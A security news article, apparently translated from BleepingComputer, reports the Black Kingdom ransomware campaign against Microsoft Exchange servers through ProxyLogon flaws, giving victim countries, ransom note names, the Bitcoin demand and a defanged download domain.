HomesecurityBlack Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the ...

Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

Another ransomware company known as Black Kingdom exploits Microsoft Exchange Server ProxyLogon vulnerabilities to encrypt servers. In particular, over the weekend, security researcher Marcus Hutchins, also known as MalwareTechBlog, wrote in Twitter that malicious agents were violating Microsoft Exchange servers through ProxyLogon vulnerabilities for ransomware development.

Read also: DearCry ransomware: Targets unpatched Microsoft Exchange servers

Based on the logs from honeypots Hutchins reported that malicious agents exploited the vulnerabilities to run a PowerShell script that downloads the executable ransomware from «Yuuuuu44 [.] Com» and then transfer it to other computers on the network.

Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims
Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

Based on submissions to ransomware's ID Ransomware site, the victims' devices were encrypted as part of the Black Kingdom campaign, with the first submissions appearing on March 18th.

Michael Gillespie, creator of ID Ransomware, told BleepingComputer that his system has seen more than 30 unique submissions to his system, many of which are submitted directly from mail servers.

The victims are in Greece, the USA, Canada, Austria, Switzerland, Russia, France, Israel, the United Kingdom, Italy, Germany, Australia and Croatia..

Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims
Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

When encrypting devices, ransomware encrypts files using random extensions and then creates a ransom note named decrypt_file.TxT. Hutchins pointed out that he saw a different ransom note with the name ReadMe.txt using different text.

Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

BleepingComputer has seen ransom notes claiming $ 10.000 in Bitcoin and using the same Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT) for payment. This Bitcoin address received only one payment on March 18.

Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims
Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

Another ransomware known as BlackKingdom was used in attacks that took place in June 2020, when hackers broke into corporate networks exploiting vulnerabilities in the Pulse VPN.

See also: Black Kingdom ransomware breaches networks with Pulse VPN defects

Although it has not been confirmed so far whether the recent attacks and those from the summer of 2020 use the same ransomware, Hutchins said the current executable ransomware is a Python script written on an executable Windows. The Black Kingdom ransomware from June 2020 was also coded in Python.

In the wake of recent attacks by Black Kingdom, cybersecurity company Emsisoft may be able to help recover files.

hackers
Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

Black Kingdom is the second confirmed ransomware to target Microsoft Exchange ProxyLogon vulnerabilities. The first was DearCry ransomware, which was used in a limited number of attacks earlier this month.

Proposal: Acer: REvil ransomware gang demands ransom of $ 50.000.000!

Recently, the 6th largest electronics maker in the world "Acer" was attacked by REvil ransomware which is estimated to have been exploited by exploiting the vulnerabilities of ProxyLogon. However, this has not been confirmed so far.

Source of information: bleepingcomputer.com

Pohackontashttps://www.secnews.gr
Every accomplishment starts with the decision to try.
spot_img

LIVE NEWS